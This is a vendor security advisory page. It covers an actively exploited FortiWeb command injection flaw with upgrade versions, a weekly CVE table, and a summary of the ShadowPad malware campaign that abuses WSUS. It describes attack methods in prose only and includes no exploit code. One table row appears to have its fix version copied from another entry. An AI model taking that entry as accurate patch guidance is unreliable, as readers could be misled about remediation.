Fortinet warns of new FortiWeb zero-day exploited in attacks

Category: <h2 class="cBlue inline m-r-10">Arti<span class="cOrange">cles</span></h2>

Fortinet warns of new FortiWeb zero-day exploited in attacks

Severity: MEDIUM (CVE-2025-58034)

CVSS v3.0 Score : 6.7

Information
FortiWeb is a Web Application Firewall (WAF) solution designed to protect web applications and APIs from attacks such as cross-site scripting (XSS), SQL injection, bot attacks, DDoS (distributed denial of service) and other online threats.

Incident

The vulnerability CVE-2025-58034, reported by Trend Micro’s Trend Research team, is an OS Command Injection flaw that allows an attacker with system access privileges to execute commands on the system through specially crafted HTTP requests or CLI commands.

This vulnerability is considered relatively easy to exploit and does not require user interaction. Trend Micro also stated that more than 2,000 attack attempts have been detected so far.

Interestingly, the development comes days after Fortinet confirmed that it silently patched another critical FortiWeb vulnerability (CVE-2025-64446, CVSS score: 9.1) in version 8.0.2. Although the company has not clarified if the exploitation activity is linked, Orange Cyberdefense said it observed "several exploitation campaigns" chaining CVE-2025-58034 with CVE-2025-64446 to facilitate authentication bypass and command injection.

Recommendation

FortiWeb 8.0.0 through 8.0.1 (Upgrade to 8.0.2 or above)
FortiWeb 7.6.0 through 7.6.5 (Upgrade to 7.6.6 or above)
FortiWeb 7.4.0 through 7.4.10 (Upgrade to 7.4.11 or above)
FortiWeb 7.2.0 through 7.2.11 (Upgrade to 7.2.12 or above)
FortiWeb 7.0.0 through 7.0.11 (Upgrade to 7.0.12 or above)

The important things is Security systems. We must concern and monitor as usual.
For more information please contact
Email :sales@inetms.co.th
065 149 2822 (Ms.Suphatson )
063 204 4534 (Ms.Atsamaphorn)
065 929 6330 (Ms.Kansinee)
061 387 9439 (Ms.Sirilak)
092 257 6902 (Ms.Narusorn)
063 197 7510 (Mr.Yanotai)
065 725 7405 (Ms.Nattharini)

References

Weekly Interesting CVE

NO.	CVE Name	Published Date	Last Update	Device/Appplication/OS Target	Attack Type	CVSS Severity Rating	Detail	Solution	Reference
1	CVE-2025-64310	21/11/2025	21/11/2025	EPSON WebConfig and Epson Web Control for SEIKO EPSON Projector Products	Improper Restriction of Excessive Authentication Attempts	9.8	The affected software fails to properly restrict the number of login attempts. This flaw allows an attacker to perform a brute-force attack to identify and gain access to an administrative user's password.	Update latest version	https://jvn.jp/en/vu/JVNVU95021911/
2	CVE-2025-65108	21/11/2025	21/11/2025	md-to-pdf Versions prior to 5.2.5	Code Injection	10.0	This vulnerability exists in the md-to-pdf CLI tool. Prior to version 5.2.5, a Markdown front-matter block containing a JavaScript delimiter causes the JS engine in the gray-matter library to execute arbitrary code within the md-to-pdf converter process.	Update to version 5.2.5 or later.	https://github.com/simonhaenisch/md-to-pdf/security/advisories/GHSA-547r-qmjm-8hvw
3	CVE-2025-64755	21/11/2025	21/11/2025	@anthropic-ai/claude-code Versions prior to 2.0.31	Os command injection	8.7	The vulnerability arises from an error in sed command parsing within the Claude Code package. This flaw makes it possible to bypass the read-only validation and allows an attacker to write to arbitrary files on the host system.	Update package to version 2.0.31 or later	https://github.com/anthropics/claude-code/security/advisories/GHSA-7mv8-j34q-vp7q
4	CVE-2025-12170	21/11/2025	21/11/2025	Checkbox Plugin for WordPress Version prior to 2.8.10	Missing Authorization	5.3	The vulnerability is a Missing Authorization issue on the AJAX endpoint. This flaw allows an unauthenticated attacker to exploit the endpoint to clear log files, resulting in an unauthorized loss of log data.	Update to version 5.2.5 or later.	https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/checkbox/checkbox-2810-missing-authorization-to-unauthenticated-log-clearing
5	CVE-2025-11001	19/11/2025	24/11/2025	7-ZIP	Remote Code Execution	7.0	7-Zip ZIP File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this product is required to exploit this vulnerability but attack vectors may vary depending on the implementation.	Update to version 25.00 or later.	https://www.zerodayinitiative.com/advisories/ZDI-25-949

Malware News or Campaign IOC/IOA | EN

No	Campaign Name	Detection Date	Attack Type	Description	Mitigation/Remediation
1	ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access	24/11/2025	Remote Code Execution	Hackers are reportedly exploiting a critical vulnerability in Windows Server Update Services (WSUS) to continue distributing the ShadowPad malware. This follows the release of a proof-of-concept (PoC) vulnerability, codenamed CVE-2025-59287, which allows attackers to “execute arbitrary code on a machine,” giving them complete control over the server if they haven’t patched Microsoft’s recently released patch. Once compromised, hackers use PowerShell to gain control over the machine and then download the ShadowPad malware using commands like certutil and curl. ShadowPad is a highly sophisticated “backdoor” malware capable of evading detection and remaining invisible on the machine. It uses DLL side-loading techniques to disguise itself as a legitimate file. Worryingly, this malware is linked to state-sponsored hacking groups and is commonly used to target large organizations, particularly critical infrastructure and organizations. Experts warn that the number of attacks following the release of the PoC has increased rapidly, and the severity is expected to continue to increase unless organizations promptly patch and patch their WSUS systems.	Avoid clicking on suspicious links or downloading software from untrusted sources. The organization conducts regular awareness training for all employees.

Campaign Name

Detection Date

Attack

Type

Description

Mitigation/Remediation

ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access

24/11/2025

Remote Code Execution

Hackers are reportedly exploiting a critical vulnerability in Windows Server Update Services (WSUS) to continue distributing the ShadowPad malware. This follows the release of a proof-of-concept (PoC) vulnerability, codenamed CVE-2025-59287, which allows attackers to “execute arbitrary code on a machine,” giving them complete control over the server if they haven’t patched Microsoft’s recently released patch. Once compromised, hackers use PowerShell to gain control over the machine and then download the ShadowPad malware using commands like certutil and curl. ShadowPad is a highly sophisticated “backdoor” malware capable of evading detection and remaining invisible on the machine. It uses DLL side-loading techniques to disguise itself as a legitimate file. Worryingly, this malware is linked to state-sponsored hacking groups and is commonly used to target large organizations, particularly critical infrastructure and organizations. Experts warn that the number of attacks following the release of the PoC has increased rapidly, and the severity is expected to continue to increase unless organizations promptly patch and patch their WSUS systems.

Avoid clicking on suspicious links or downloading software from untrusted sources.
The organization conducts regular awareness training for all employees.

Ref: https://thehackernews.com/2025/11/shadowpad-malware-actively-exploits.html

02 December 2025

Viewed 188 time

Fortinet warns of new FortiWeb zero-day exploited in attacks

Fortinet warns of new FortiWeb zero-day exploited in attacks

INET MANAGED SERVICES CO., LTD.

Sales Department